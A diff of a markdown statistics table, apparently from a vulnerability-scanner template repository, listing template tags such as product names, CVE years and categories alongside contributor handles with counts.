-| dedecms                                         |    10 | nkxxkn                                |     2 |                      |       |          |       |      |       |
-| fastjson                                        |    10 | 0xcrypto                              |     2 |                      |       |          |       |      |       |
-| prometheus                                      |    10 | koti2                                 |     2 |                      |       |          |       |      |       |
-| thinkphp                                        |    10 | kiblyn11                              |     2 |                      |       |          |       |      |       |
-| icewarp                                         |    10 | c3l3si4n                              |     2 |                      |       |          |       |      |       |
-| windows                                         |    10 | geekby                                |     2 |                      |       |          |       |      |       |
-| headless                                        |    10 | kre80r                                |     2 |                      |       |          |       |      |       |
-| zabbix                                          |     9 | martincodes-de                        |     2 |                      |       |          |       |      |       |
-| versa                                           |     9 | joshlarsen                            |     2 |                      |       |          |       |      |       |
-| firebase                                        |     9 | g4l1t0                                |     2 |                      |       |          |       |      |       |
-| installer                                       |     9 | x1m_martijn                           |     2 |                      |       |          |       |      |       |
-| pfsense                                         |     9 | socketz                               |     2 |                      |       |          |       |      |       |
-| gitea                                           |     9 | paperpen                              |     2 |                      |       |          |       |      |       |
-| elasticsearch                                   |     9 | thezakman                             |     2 |                      |       |          |       |      |       |
-| scada                                           |     9 | z0ne                                  |     2 |                      |       |          |       |      |       |
-| wso2                                            |     9 | supras                                |     2 |                      |       |          |       |      |       |
-| solr                                            |     9 | gevakun                               |     2 |                      |       |          |       |      |       |
-| prestashop                                      |     9 | moritz nentwig                        |     2 |                      |       |          |       |      |       |
-| bitbucket                                       |     9 | ayadim                                |     2 |                      |       |          |       |      |       |
-| cnvd2020                                        |     9 | bananabr                              |     2 |                      |       |          |       |      |       |
-| opencats                                        |     9 | mohammedsaneem                        |     2 |                      |       |          |       |      |       |
-| cache                                           |     9 | 0xnirvana                             |     2 |                      |       |          |       |      |       |
-| sitecore                                        |     9 | foulenzer                             |     2 |                      |       |          |       |      |       |
-| kube                                            |     9 | cckuakilong                           |     2 |                      |       |          |       |      |       |
-| druid                                           |     9 | bing0o                                |     2 |                      |       |          |       |      |       |
-| vcenter                                         |     9 | ep1csage                              |     2 |                      |       |          |       |      |       |
-| hms                                             |     8 | uomogrande                            |     2 |                      |       |          |       |      |       |
-| ognl                                            |     8 | pxmme1337                             |     2 |                      |       |          |       |      |       |
-| crlf                                            |     8 | 666asd                                |     2 |                      |       |          |       |      |       |
-| cisco-switch                                    |     8 | zomsop82                              |     2 |                      |       |          |       |      |       |
-| metadata                                        |     8 | hetroublemakr                         |     2 |                      |       |          |       |      |       |
-| unauthenticated                                 |     8 | gtrrnr                                |     2 |                      |       |          |       |      |       |
-| vbulletin                                       |     8 | gal nagli                             |     2 |                      |       |          |       |      |       |
-| spotweb                                         |     8 | cristi vlad (@cristivlad25)           |     2 |                      |       |          |       |      |       |
-| iis                                             |     8 | bsysop                                |     2 |                      |       |          |       |      |       |
-| emerge                                          |     8 | 8arthur                               |     2 |                      |       |          |       |      |       |
-| recon                                           |     8 | joeldeleep                            |     2 |                      |       |          |       |      |       |
-| oauth                                           |     8 | ree4pwn                               |     2 |                      |       |          |       |      |       |
-| hikvision                                       |     8 | nvn1729                               |     2 |                      |       |          |       |      |       |
-| default-page                                    |     8 | udit_thakkur                          |     2 |                      |       |          |       |      |       |
-| mirai                                           |     8 | randomdhiraj                          |     2 |                      |       |          |       |      |       |
-| jetbrains                                       |     8 | joshua rogers                         |     2 |                      |       |          |       |      |       |
-| bucket                                          |     8 | rafaelwdornelas                       |     2 |                      |       |          |       |      |       |
-| osint-news                                      |     8 | j3ssie                                |     2 |                      |       |          |       |      |       |
-| exchange                                        |     8 | nuk3s3c                               |     2 |                      |       |          |       |      |       |
-| config-audit                                    |     8 | thardt-praetorian                     |     2 |                      |       |          |       |      |       |
-| console                                         |     8 | notnotnotveg                          |     2 |                      |       |          |       |      |       |
-| manager                                         |     8 | sbani                                 |     2 |                      |       |          |       |      |       |
-| smtp                                            |     8 | raesene                               |     2 |                      |       |          |       |      |       |
-| atom                                            |     8 | ehsahil                               |     2 |                      |       |          |       |      |       |
-| maps                                            |     7 | 0xprial                               |     2 |                      |       |          |       |      |       |
-| secret                                          |     7 | 0xelkomy                              |     2 |                      |       |          |       |      |       |
-| sophos                                          |     7 | afaq                                  |     2 |                      |       |          |       |      |       |
-| go                                              |     7 | coldfish                              |     2 |                      |       |          |       |      |       |
-| hashicorp                                       |     7 | korteke                               |     2 |                      |       |          |       |      |       |
-| ivanti                                          |     7 | ajaysenr                              |     2 |                      |       |          |       |      |       |
-| samsung                                         |     7 | lotusdll                              |     2 |                      |       |          |       |      |       |
-| blockchain                                      |     7 | codexlynx                             |     2 |                      |       |          |       |      |       |
-| fortios                                         |     7 | vavkamil                              |     2 |                      |       |          |       |      |       |
-| avtech                                          |     7 | myztique                              |     2 |                      |       |          |       |      |       |
-| ofbiz                                           |     7 | danielmofer                           |     2 |                      |       |          |       |      |       |
-| websphere                                       |     7 | n-thumann                             |     2 |                      |       |          |       |      |       |
-| blind                                           |     7 | streetofhackerr007                    |     2 |                      |       |          |       |      |       |
-| gogs                                            |     7 | v0idc0de                              |     2 |                      |       |          |       |      |       |
-| sangfor                                         |     7 | paradessia                            |     2 |                      |       |          |       |      |       |
-| facebook                                        |     7 | convisoappsec                         |     2 |                      |       |          |       |      |       |
-| mobileiron                                      |     7 | shelled                               |     2 |                      |       |          |       |      |       |
-| dropbox                                         |     7 | dheerajmadhukar                       |     2 |                      |       |          |       |      |       |
-| vms                                             |     7 | sinkettu                              |     2 |                      |       |          |       |      |       |
-| discord                                         |     7 | e1a                                   |     2 |                      |       |          |       |      |       |
-| shopify                                         |     7 | 0xsmiley                              |     2 |                      |       |          |       |      |       |
-| odoo                                            |     7 | w4cky_                                |     2 |                      |       |          |       |      |       |
-| nacos                                           |     7 | luci                                  |     2 |                      |       |          |       |      |       |
-| nagiosxi                                        |     7 | amsda                                 |     2 |                      |       |          |       |      |       |
-| error                                           |     7 | heeress                               |     2 |                      |       |          |       |      |       |
-| ec2                                             |     7 | redteambrasil                         |     2 |                      |       |          |       |      |       |
-| rconfig                                         |     7 | smaranchand                           |     2 |                      |       |          |       |      |       |
-| seeyon                                          |     7 | bp0lr                                 |     2 |                      |       |          |       |      |       |
-| squirrelmail                                    |     7 | dogancanbakir                         |     2 |                      |       |          |       |      |       |
-| oa                                              |     7 | carlosvieira                          |     1 |                      |       |          |       |      |       |
-| nagios                                          |     7 | secthebit                             |     1 |                      |       |          |       |      |       |
-| huawei                                          |     7 | 5up3r541y4n                           |     1 |                      |       |          |       |      |       |
-| cacti                                           |     6 | alperenkesk                           |     1 |                      |       |          |       |      |       |
-| keycloak                                        |     6 | arall                                 |     1 |                      |       |          |       |      |       |
-| plesk                                           |     6 | liquidsec                             |     1 |                      |       |          |       |      |       |
-| filemanager                                     |     6 | elder tao                             |     1 |                      |       |          |       |      |       |
-| jeecg                                           |     6 | orpheus                               |     1 |                      |       |          |       |      |       |
-| jamf                                            |     6 | mesaglio                              |     1 |                      |       |          |       |      |       |
-| kubelet                                         |     6 | dmartyn                               |     1 |                      |       |          |       |      |       |
-| elfinder                                        |     6 | ok_bye_now                            |     1 |                      |       |          |       |      |       |
-| cobbler                                         |     6 | couskito                              |     1 |                      |       |          |       |      |       |
-| jetty                                           |     6 | anon-artist                           |     1 |                      |       |          |       |      |       |
-| fpd                                             |     6 | amanrawat                             |     1 |                      |       |          |       |      |       |
-| webmin                                          |     6 | petergrifin                           |     1 |                      |       |          |       |      |       |
-| artica                                          |     6 | zy9ard3                               |     1 |                      |       |          |       |      |       |
-| slack                                           |     6 | irshadahamed                          |     1 |                      |       |          |       |      |       |
-| minio                                           |     6 | mhdsamx                               |     1 |                      |       |          |       |      |       |
-| pmb                                             |     6 | aceseven (digisec360)                 |     1 |                      |       |          |       |      |       |
-| symantec                                        |     6 | metascan                              |     1 |                      |       |          |       |      |       |
-| lucee                                           |     6 | florianmaak                           |     1 |                      |       |          |       |      |       |
-| doctor-appointment-system                       |     6 | rodnt                                 |     1 |                      |       |          |       |      |       |
-| magmi                                           |     6 | manikanta a.k.a @secureitmania        |     1 |                      |       |          |       |      |       |
-| liferay                                         |     6 | yashanand155                          |     1 |                      |       |          |       |      |       |
-| mongodb                                         |     6 | queencitycyber                        |     1 |                      |       |          |       |      |       |
-| nexus                                           |     6 | y0no                                  |     1 |                      |       |          |       |      |       |
-| newrelic                                        |     6 | wabafet                               |     1 |                      |       |          |       |      |       |
-| 74cms                                           |     6 | mzack9999                             |     1 |                      |       |          |       |      |       |
-| openvpn                                         |     6 | lady_bug                              |     1 |                      |       |          |       |      |       |
-| tikiwiki                                        |     6 | hexcat                                |     1 |                      |       |          |       |      |       |
-| database                                        |     6 | tehtbl                                |     1 |                      |       |          |       |      |       |
-| leak                                            |     6 | droberson                             |     1 |                      |       |          |       |      |       |
-| moodle                                          |     6 | revblock                              |     1 |                      |       |          |       |      |       |
-| sonarqube                                       |     6 | igibanez                              |     1 |                      |       |          |       |      |       |
-| zhiyuan                                         |     6 | narluin                               |     1 |                      |       |          |       |      |       |
-| python                                          |     6 | luisfelipe146                         |     1 |                      |       |          |       |      |       |
-| microstrategy                                   |     6 | bad5ect0r                             |     1 |                      |       |          |       |      |       |
-| flutterwave                                     |     6 | mr. bobo hp                           |     1 |                      |       |          |       |      |       |
-| bigip                                           |     6 | xcapri                                |     1 |                      |       |          |       |      |       |
-| opensis                                         |     6 | ransomsec                             |     1 |                      |       |          |       |      |       |
-| s3                                              |     6 | lixts                                 |     1 |                      |       |          |       |      |       |
-| activemq                                        |     6 | x6263                                 |     1 |                      |       |          |       |      |       |
-| solarwinds                                      |     6 | yuansec                               |     1 |                      |       |          |       |      |       |
-| storage                                         |     5 | nuts7                                 |     1 |                      |       |          |       |      |       |
-| terramaster                                     |     5 | un-fmunozs                            |     1 |                      |       |          |       |      |       |
-| caucho                                          |     5 | daffianfo                             |     1 |                      |       |          |       |      |       |
-| gocd                                            |     5 | noah @thesubtlety                     |     1 |                      |       |          |       |      |       |
-| geoserver                                       |     5 | fmunozs                               |     1 |                      |       |          |       |      |       |
-| openemr                                         |     5 | ahmed abou-ela                        |     1 |                      |       |          |       |      |       |
-| tenda                                           |     5 | jonathanwalker                        |     1 |                      |       |          |       |      |       |
-| heroku                                          |     5 | mrcl0wnlab                            |     1 |                      |       |          |       |      |       |
-| jupyter                                         |     5 | arr0way                               |     1 |                      |       |          |       |      |       |
-| rseenet                                         |     5 | blckraven                             |     1 |                      |       |          |       |      |       |
-| rfi                                             |     5 | pulsesecurity.co.nz                   |     1 |                      |       |          |       |      |       |
-| avaya                                           |     5 | zandros0                              |     1 |                      |       |          |       |      |       |
-| firmware                                        |     5 | ph33rr                                |     1 |                      |       |          |       |      |       |
-| couchdb                                         |     5 | aringo-bf                             |     1 |                      |       |          |       |      |       |
-| strapi                                          |     5 | willd96                               |     1 |                      |       |          |       |      |       |
-| server                                          |     5 | tirtha_mandal                         |     1 |                      |       |          |       |      |       |
-| phpinfo                                         |     5 | qlkwej                                |     1 |                      |       |          |       |      |       |
-| ethereum                                        |     5 | whynotke                              |     1 |                      |       |          |       |      |       |
-| hybris                                          |     5 | 0xceeb                                |     1 |                      |       |          |       |      |       |
-| awstats                                         |     5 | galoget                               |     1 |                      |       |          |       |      |       |
-| sql                                             |     5 | bughuntersurya                        |     1 |                      |       |          |       |      |       |
-| avideo                                          |     5 | luskabol                              |     1 |                      |       |          |       |      |       |
-| square                                          |     5 | ringo                                 |     1 |                      |       |          |       |      |       |
-| instrusive                                      |     5 | bibeksapkota (sar00n)                 |     1 |                      |       |          |       |      |       |
-| jwt                                             |     5 | zhenwarx                              |     1 |                      |       |          |       |      |       |
-| apisix                                          |     5 | unkl4b                                |     1 |                      |       |          |       |      |       |
-| ruckus                                          |     5 | davidfegyver                          |     1 |                      |       |          |       |      |       |
-| fatpipe                                         |     5 | andirrahmani1                         |     1 |                      |       |          |       |      |       |
-| zzzcms                                          |     5 | arqsz                                 |     1 |                      |       |          |       |      |       |
-| asana                                           |     5 | tea                                   |     1 |                      |       |          |       |      |       |
-| kkfileview                                      |     5 | allenwest24                           |     1 |                      |       |          |       |      |       |
-| xmlrpc                                          |     5 | vikas kundu                           |     1 |                      |       |          |       |      |       |
-| asp                                             |     5 | flag007                               |     1 |                      |       |          |       |      |       |
-| elastic                                         |     5 | lucky0x0d                             |     1 |                      |       |          |       |      |       |
-| akamai                                          |     5 | 0xteles                               |     1 |                      |       |          |       |      |       |
-| microfocus                                      |     5 | b4uh0lz                               |     1 |                      |       |          |       |      |       |
-| parallels                                       |     5 | bugvsme                               |     1 |                      |       |          |       |      |       |
-| cockpit                                         |     5 | izn0u                                 |     1 |                      |       |          |       |      |       |
-| carrental                                       |     5 | nobody                                |     1 |                      |       |          |       |      |       |
-| bmc                                             |     5 | dale clarke                           |     1 |                      |       |          |       |      |       |
-| vrealize                                        |     5 | brabbit10                             |     1 |                      |       |          |       |      |       |
-| resin                                           |     5 | mukundbhuva                           |     1 |                      |       |          |       |      |       |
-| web3                                            |     5 | 0xelkomy & c0nqr0r                    |     1 |                      |       |          |       |      |       |
-| paypal                                          |     5 | higor melgaço (eremit4)               |     1 |                      |       |          |       |      |       |
-| adminer                                         |     5 | mubassirpatel                         |     1 |                      |       |          |       |      |       |
-| typo3                                           |     5 | _c0wb0y_                              |     1 |                      |       |          |       |      |       |
-| circarlife                                      |     5 | sicksec                               |     1 |                      |       |          |       |      |       |
-| metinfo                                         |     5 | viniciuspereiras                      |     1 |                      |       |          |       |      |       |
-| redmine                                         |     4 | husain                                |     1 |                      |       |          |       |      |       |
-| kentico                                         |     4 | unp4ck                                |     1 |                      |       |          |       |      |       |
-| search                                          |     4 | parzival                              |     1 |                      |       |          |       |      |       |
-| pentaho                                         |     4 | akash.c                               |     1 |                      |       |          |       |      |       |
-| kibana                                          |     4 | w0tx                                  |     1 |                      |       |          |       |      |       |
-| roxy                                            |     4 | thirukrishnan                         |     1 |                      |       |          |       |      |       |
-| mautic                                          |     4 | imhunterand                           |     1 |                      |       |          |       |      |       |
-| newstatpress                                    |     4 | justmumu                              |     1 |                      |       |          |       |      |       |
-| axigen                                          |     4 | sinsinology                           |     1 |                      |       |          |       |      |       |
-| openstack                                       |     4 | jna1                                  |     1 |                      |       |          |       |      |       |
-| seagate                                         |     4 | hanlaomo                              |     1 |                      |       |          |       |      |       |
-| httpd                                           |     4 | mihhailsokolov                        |     1 |                      |       |          |       |      |       |
-| horde                                           |     4 | aaron_costello                        |     1 |                      |       |          |       |      |       |
-|                                                 |       | (@conspiracyproof)                    |       |                      |       |          |       |      |       |
-| finicity                                        |     4 | freakyclown                           |     1 |                      |       |          |       |      |       |
-| ebs                                             |     4 | phyr3wall                             |     1 |                      |       |          |       |      |       |
-| openfire                                        |     4 | mabdullah22                           |     1 |                      |       |          |       |      |       |
-| kevinlab                                        |     4 | ipanda                                |     1 |                      |       |          |       |      |       |
-| beyondtrust                                     |     4 | retr0                                 |     1 |                      |       |          |       |      |       |
-| mikrotik                                        |     4 | xshuden                               |     1 |                      |       |          |       |      |       |
-| pixie                                           |     4 | jas37                                 |     1 |                      |       |          |       |      |       |
-| metabase                                        |     4 | therealtoastycat                      |     1 |                      |       |          |       |      |       |
-| phppgadmin                                      |     4 | houdinis                              |     1 |                      |       |          |       |      |       |
-| httpserver                                      |     4 | act1on3                               |     1 |                      |       |          |       |      |       |
-| hongdian                                        |     4 | b0yd                                  |     1 |                      |       |          |       |      |       |
-| casaos                                          |     4 | booboohq                              |     1 |                      |       |          |       |      |       |
-| cve2007                                         |     4 | mayankpandey01                        |     1 |                      |       |          |       |      |       |
-| ldap                                            |     4 | rivalsec                              |     1 |                      |       |          |       |      |       |
-| thinkcmf                                        |     4 | kiks7                                 |     1 |                      |       |          |       |      |       |
-| mlflow                                          |     4 | luqman                                |     1 |                      |       |          |       |      |       |
-| telesquare                                      |     4 | qianbenhyu                            |     1 |                      |       |          |       |      |       |
-| osint-archived                                  |     4 | esonhugh                              |     1 |                      |       |          |       |      |       |
-| pie-register                                    |     4 | am0nt31r0                             |     1 |                      |       |          |       |      |       |
-| jellyfin                                        |     4 | carrot2                               |     1 |                      |       |          |       |      |       |
-| sendgrid                                        |     4 | intx0x80                              |     1 |                      |       |          |       |      |       |
-| qnap                                            |     4 | andreluna                             |     1 |                      |       |          |       |      |       |
-| candidats                                       |     4 | keni0k                                |     1 |                      |       |          |       |      |       |
-| bittrex                                         |     4 | jaskaran                              |     1 |                      |       |          |       |      |       |
-| dolibarr                                        |     4 | 0xd0ff9                               |     1 |                      |       |          |       |      |       |
-| cve2005                                         |     4 | elitebaz                              |     1 |                      |       |          |       |      |       |
-| puppet                                          |     4 | xianke                                |     1 |                      |       |          |       |      |       |
-| metasploit                                      |     4 | vzamanillo                            |     1 |                      |       |          |       |      |       |
-| prtg                                            |     4 | exploitation                          |     1 |                      |       |          |       |      |       |
-| yeswiki                                         |     4 | 8authur                               |     1 |                      |       |          |       |      |       |
-| hoteldruid                                      |     4 | becivells                             |     1 |                      |       |          |       |      |       |
-| sentry                                          |     4 | jbaines-r7                            |     1 |                      |       |          |       |      |       |
-| cloudflare                                      |     4 | aresx                                 |     1 |                      |       |          |       |      |       |
-| cnvd2019                                        |     4 | ndmalc                                |     1 |                      |       |          |       |      |       |
-| spark                                           |     4 | stupidfish                            |     1 |                      |       |          |       |      |       |
-| arcgis                                          |     4 | rojanrijal                            |     1 |                      |       |          |       |      |       |
-| panos                                           |     4 | pry0cc                                |     1 |                      |       |          |       |      |       |
-| tls                                             |     4 | sshell                                |     1 |                      |       |          |       |      |       |
-| flink                                           |     4 | ramkrishna sawant                     |     1 |                      |       |          |       |      |       |
-| telerik                                         |     4 | schniggie                             |     1 |                      |       |          |       |      |       |
-| powerjob                                        |     4 | danigoland                            |     1 |                      |       |          |       |      |       |
-| centos                                          |     4 | elouhi                                |     1 |                      |       |          |       |      |       |
-| flickr                                          |     4 | udyz                                  |     1 |                      |       |          |       |      |       |
-| consul                                          |     4 | kr1shna4garwal                        |     1 |                      |       |          |       |      |       |
-| confluent                                       |     4 | palanichamy_perumal                   |     1 |                      |       |          |       |      |       |
-| aspose                                          |     4 | mrharshvardhan                        |     1 |                      |       |          |       |      |       |
-| photo                                           |     4 | majidmc2                              |     1 |                      |       |          |       |      |       |
-| nextjs                                          |     4 | aringo                                |     1 |                      |       |          |       |      |       |
-| swagger                                         |     4 | fopina                                |     1 |                      |       |          |       |      |       |
-| jorani                                          |     4 | alexrydzak                            |     1 |                      |       |          |       |      |       |
-| springcloud                                     |     4 | naglis                                |     1 |                      |       |          |       |      |       |
-| nosqli                                          |     4 | nerrorsec                             |     1 |                      |       |          |       |      |       |
-| qdpm                                            |     4 | kailashbohara                         |     1 |                      |       |          |       |      |       |
-| file-upload                                     |     4 | _darrenmartyn                         |     1 |                      |       |          |       |      |       |
-| gnuboard                                        |     4 | akokonunes                            |     1 |                      |       |          |       |      |       |
-| panabit                                         |     4 | opencirt                              |     1 |                      |       |          |       |      |       |
-| voip                                            |     4 | af001                                 |     1 |                      |       |          |       |      |       |
-| goanywhere                                      |     4 | omarkurt                              |     1 |                      |       |          |       |      |       |
-| codeigniter                                     |     4 | guax1                                 |     1 |                      |       |          |       |      |       |
-| harbor                                          |     4 | shifacyclewla                         |     1 |                      |       |          |       |      |       |
-| ampache                                         |     4 | mass0ma                               |     1 |                      |       |          |       |      |       |
-| froxlor                                         |     4 | 0xh7ml                                |     1 |                      |       |          |       |      |       |
-| zend                                            |     4 | sec_hawk                              |     1 |                      |       |          |       |      |       |
-| mostra                                          |     4 | ahmetpergamum                         |     1 |                      |       |          |       |      |       |
-| datadog                                         |     4 | nytr0gen                              |     1 |                      |       |          |       |      |       |
-| ems                                             |     4 | lamscun                               |     1 |                      |       |          |       |      |       |
-| grav                                            |     4 | lark lab                              |     1 |                      |       |          |       |      |       |
-| hpe                                             |     4 | noobexploiter                         |     1 |                      |       |          |       |      |       |
-| graylog                                         |     4 | pdp                                   |     1 |                      |       |          |       |      |       |
-| dropbear                                        |     4 | borna nematzadeh                      |     1 |                      |       |          |       |      |       |
-| elementor                                       |     4 | viondexd                              |     1 |                      |       |          |       |      |       |
-| express                                         |     4 | lethargynavigator                     |     1 |                      |       |          |       |      |       |
-| artifactory                                     |     4 | zeyad azima                           |     1 |                      |       |          |       |      |       |
-| stripe                                          |     4 | farish                                |     1 |                      |       |          |       |      |       |
-| webshell                                        |     4 | jeya seelan                           |     1 |                      |       |          |       |      |       |
-| aura                                            |     4 | evan rubinstien                       |     1 |                      |       |          |       |      |       |
-| concrete                                        |     4 | jbertman                              |     1 |                      |       |          |       |      |       |
-| javascript                                      |     4 | mbmy                                  |     1 |                      |       |          |       |      |       |
-| log                                             |     4 | noamrathaus                           |     1 |                      |       |          |       |      |       |
-| mysql                                           |     4 | exid                                  |     1 |                      |       |          |       |      |       |
-| zte                                             |     4 | paper-pen                             |     1 |                      |       |          |       |      |       |
-| rabbitmq                                        |     4 | michael wedl                          |     1 |                      |       |          |       |      |       |
-| royalevent                                      |     4 | ptonewreckin                          |     1 |                      |       |          |       |      |       |
-| age-encryption                                  |     4 | hakimkt                               |     1 |                      |       |          |       |      |       |
-| churchcrm                                       |     4 | colbyjack1134                         |     1 |                      |       |          |       |      |       |
-| umbraco                                         |     4 | co0nan                                |     1 |                      |       |          |       |      |       |
-| mostracms                                       |     4 | shivampand3y                          |     1 |                      |       |          |       |      |       |
-| postmessage                                     |     4 | 0xceba                                |     1 |                      |       |          |       |      |       |
-| wcs                                             |     4 | failopen                              |     1 |                      |       |          |       |      |       |
-| easypost                                        |     4 | pjborah                               |     1 |                      |       |          |       |      |       |
-| mailchimp                                       |     4 | brianlam38                            |     1 |                      |       |          |       |      |       |
-| linkerd                                         |     4 | nielsing                              |     1 |                      |       |          |       |      |       |
-| dos                                             |     3 | iphantasmic                           |     1 |                      |       |          |       |      |       |
-| splunk                                          |     3 | thebinitghimire                       |     1 |                      |       |          |       |      |       |
-| purchase-order                                  |     3 | piyushchhiroliya                      |     1 |                      |       |          |       |      |       |
-| lotus                                           |     3 | barthy.koeln                          |     1 |                      |       |          |       |      |       |
-| clusterengine                                   |     3 | hardik-rathod                         |     1 |                      |       |          |       |      |       |
-| wbce                                            |     3 | kba@sogeti_esec                       |     1 |                      |       |          |       |      |       |
-| intercom                                        |     3 | d0rkerdevil                           |     1 |                      |       |          |       |      |       |
-| postman                                         |     3 | jeya.seelan                           |     1 |                      |       |          |       |      |       |
-| petya                                           |     3 | ratnadip gajbhiye                     |     1 |                      |       |          |       |      |       |
-| weiphp                                          |     3 | amnotacat                             |     1 |                      |       |          |       |      |       |
-| cluster                                         |     3 | realexp3rt                            |     1 |                      |       |          |       |      |       |
-| listserv                                        |     3 | rschio                                |     1 |                      |       |          |       |      |       |
-| lighttpd                                        |     3 | sherlocksecurity                      |     1 |                      |       |          |       |      |       |
-| telnet                                          |     3 | lingtren                              |     1 |                      |       |          |       |      |       |
-| rat                                             |     3 | shiar                                 |     1 |                      |       |          |       |      |       |
-| payara                                          |     3 | 0h1in9e                               |     1 |                      |       |          |       |      |       |
-| axis                                            |     3 | arliya                                |     1 |                      |       |          |       |      |       |
-| chamilo                                         |     3 | retr02332                             |     1 |                      |       |          |       |      |       |
-| samba                                           |     3 | momen eldawakhly                      |     1 |                      |       |          |       |      |       |
-| wordfence                                       |     3 | clment cruchet                        |     1 |                      |       |          |       |      |       |
-| evlink                                          |     3 | 0xtavian                              |     1 |                      |       |          |       |      |       |
-| mongo                                           |     3 | twitter.com/dheerajmadhukar           |     1 |                      |       |          |       |      |       |
-| info                                            |     3 | lrtk-coder                            |     1 |                      |       |          |       |      |       |
-| labkey                                          |     3 | s1r1u5_                               |     1 |                      |       |          |       |      |       |
-| fuelcms                                         |     3 | pudsec                                |     1 |                      |       |          |       |      |       |
-| unifi                                           |     3 | akshansh                              |     1 |                      |       |          |       |      |       |
-| nortek                                          |     3 | kchason                               |     1 |                      |       |          |       |      |       |
-| mpsec                                           |     3 | pussycat0                             |     1 |                      |       |          |       |      |       |
-| selenium                                        |     3 | kurohost                              |     1 |                      |       |          |       |      |       |
-| shiro                                           |     3 | ooooooo_q                             |     1 |                      |       |          |       |      |       |
-| thinfinity                                      |     3 | rotemreiss                            |     1 |                      |       |          |       |      |       |
-| messaging                                       |     3 | ilovebinbash                          |     1 |                      |       |          |       |      |       |
-| pulsar                                          |     3 | ynnirc                                |     1 |                      |       |          |       |      |       |
-| dzzoffice                                       |     3 | ohlinge                               |     1 |                      |       |          |       |      |       |
-| targa                                           |     3 | aaban solutions                       |     1 |                      |       |          |       |      |       |
-| itop                                            |     3 | luqmaan hadia                         |     1 |                      |       |          |       |      |       |
+| osint-blog                                      |    16 | badboycxcc                            |     3 |                      |       |          |       |      |       |
+| citrix                                          |    16 | binaryfigments                        |     3 |                      |       |          |       |      |       |
+| status                                          |    15 | splint3r7                             |     3 |                      |       |          |       |      |       |
+| cve2008                                         |    15 | yash anand @yashanand155              |     3 |                      |       |          |       |      |       |
+| magento                                         |    15 | fxploit                               |     3 |                      |       |          |       |      |       |
+| tongda                                          |    15 | davidmckennirey                       |     3 |                      |       |          |       |      |       |
+| cnvd2021                                        |    15 | vagnerd                               |     3 |                      |       |          |       |      |       |
+| hp                                              |    15 | impramodsargar                        |     3 |                      |       |          |       |      |       |
+| java                                            |    15 | parth                                 |     3 |                      |       |          |       |      |       |
+| zyxel                                           |    15 | skeltavik                             |     3 |                      |       |          |       |      |       |
+| jarm                                            |    15 | whoever                               |     3 |                      |       |          |       |      |       |
+| android                                         |    15 | fyoorer                               |     3 |                      |       |          |       |      |       |
+| seeyon                                          |    15 | dr0pd34d                              |     3 |                      |       |          |       |      |       |
+| coldfusion                                      |    14 | atomiczsec                            |     3 |                      |       |          |       |      |       |
+| osint-art                                       |    14 | huta0                                 |     3 |                      |       |          |       |      |       |
+| jboss                                           |    14 | f1tz                                  |     3 |                      |       |          |       |      |       |
+| enum                                            |    14 | ekrause                               |     3 |                      |       |          |       |      |       |
+| mail                                            |    14 | jarijaas                              |     3 |                      |       |          |       |      |       |
+| ruijie                                          |    14 | arcc                                  |     3 |                      |       |          |       |      |       |
+| audit                                           |    14 | imjust0                               |     3 |                      |       |          |       |      |       |
+| woocommerce                                     |    14 | cheesymoon                            |     3 |                      |       |          |       |      |       |
+| nodejs                                          |    14 | huowuzhao                             |     3 |                      |       |          |       |      |       |
+| osint-health                                    |    14 | yuzhe-zhang-0                         |     3 |                      |       |          |       |      |       |
+| confluence                                      |    14 | randomrobbie                          |     3 |                      |       |          |       |      |       |
+| cve2013                                         |    14 | me9187                                |     3 |                      |       |          |       |      |       |
+| npm                                             |    14 | ph33r                                 |     3 |                      |       |          |       |      |       |
+| domainmod                                       |    14 | k0pak4                                |     3 |                      |       |          |       |      |       |
+| abstractapi                                     |    13 | 0w4ys                                 |     3 |                      |       |          |       |      |       |
+| creds-stuffing                                  |    13 | evergreencartoons                     |     3 |                      |       |          |       |      |       |
+| azure                                           |    13 | lucasljm2001                          |     3 |                      |       |          |       |      |       |
+| airflow                                         |    13 | lark-lab                              |     3 |                      |       |          |       |      |       |
+| bypass                                          |    13 | johnjhacking                          |     3 |                      |       |          |       |      |       |
+| vpn                                             |    13 | bernardofsr                           |     3 |                      |       |          |       |      |       |
+| osint-dating                                    |    13 | ambassify                             |     3 |                      |       |          |       |      |       |
+| cuppa                                           |    13 | dudez                                 |     3 |                      |       |          |       |      |       |
+| laravel                                         |    13 | emenalf                               |     3 |                      |       |          |       |      |       |
+| osint-political                                 |    13 | true13                                |     3 |                      |       |          |       |      |       |
+| fortigate                                       |    13 | z3bd                                  |     3 |                      |       |          |       |      |       |
+| login-check                                     |    13 | andydoering                           |     3 |                      |       |          |       |      |       |
+| graphql                                         |    12 | canberbamber                          |     3 |                      |       |          |       |      |       |
+| dell                                            |    12 | thomas_from_offensity                 |     3 |                      |       |          |       |      |       |
+| microweber                                      |    12 | vsh00t                                |     3 |                      |       |          |       |      |       |
+| netgear                                         |    12 | nybble04                              |     3 |                      |       |          |       |      |       |
+| ruby                                            |    12 | shifacyclewala                        |     3 |                      |       |          |       |      |       |
+| dashboard                                       |    12 | m4lwhere                              |     3 |                      |       |          |       |      |       |
+| alibaba                                         |    12 | hahwul                                |     3 |                      |       |          |       |      |       |
+| kafka                                           |    12 | swissky                               |     3 |                      |       |          |       |      |       |
+| zimbra                                          |    12 | kishore-hariram                       |     2 |                      |       |          |       |      |       |
+| webserver                                       |    12 | foulenzer                             |     2 |                      |       |          |       |      |       |
+| drupal                                          |    12 | bananabr                              |     2 |                      |       |          |       |      |       |
+| auth                                            |    12 | thardt-praetorian                     |     2 |                      |       |          |       |      |       |
+| sonicwall                                       |    12 | cocxanh                               |     2 |                      |       |          |       |      |       |
+| backdoor                                        |    12 | gal nagli                             |     2 |                      |       |          |       |      |       |
+| rails                                           |    12 | 666asd                                |     2 |                      |       |          |       |      |       |
+| git                                             |    12 | amsda                                 |     2 |                      |       |          |       |      |       |
+| netsweeper                                      |    12 | ayadim                                |     2 |                      |       |          |       |      |       |
+| jolokia                                         |    11 | k11h-de                               |     2 |                      |       |          |       |      |       |
+| file-upload                                     |    11 | 0xsapra                               |     2 |                      |       |          |       |      |       |
+| phpmyadmin                                      |    11 | smaranchand                           |     2 |                      |       |          |       |      |       |
+| prestashop                                      |    11 | florianmaak                           |     2 |                      |       |          |       |      |       |
+| fastjson                                        |    11 | kiblyn11                              |     2 |                      |       |          |       |      |       |
+| spring                                          |    11 | ep1csage                              |     2 |                      |       |          |       |      |       |
+| docker                                          |    11 | clarkvoss                             |     2 |                      |       |          |       |      |       |
+| osint-video                                     |    11 | 0xsmiley                              |     2 |                      |       |          |       |      |       |
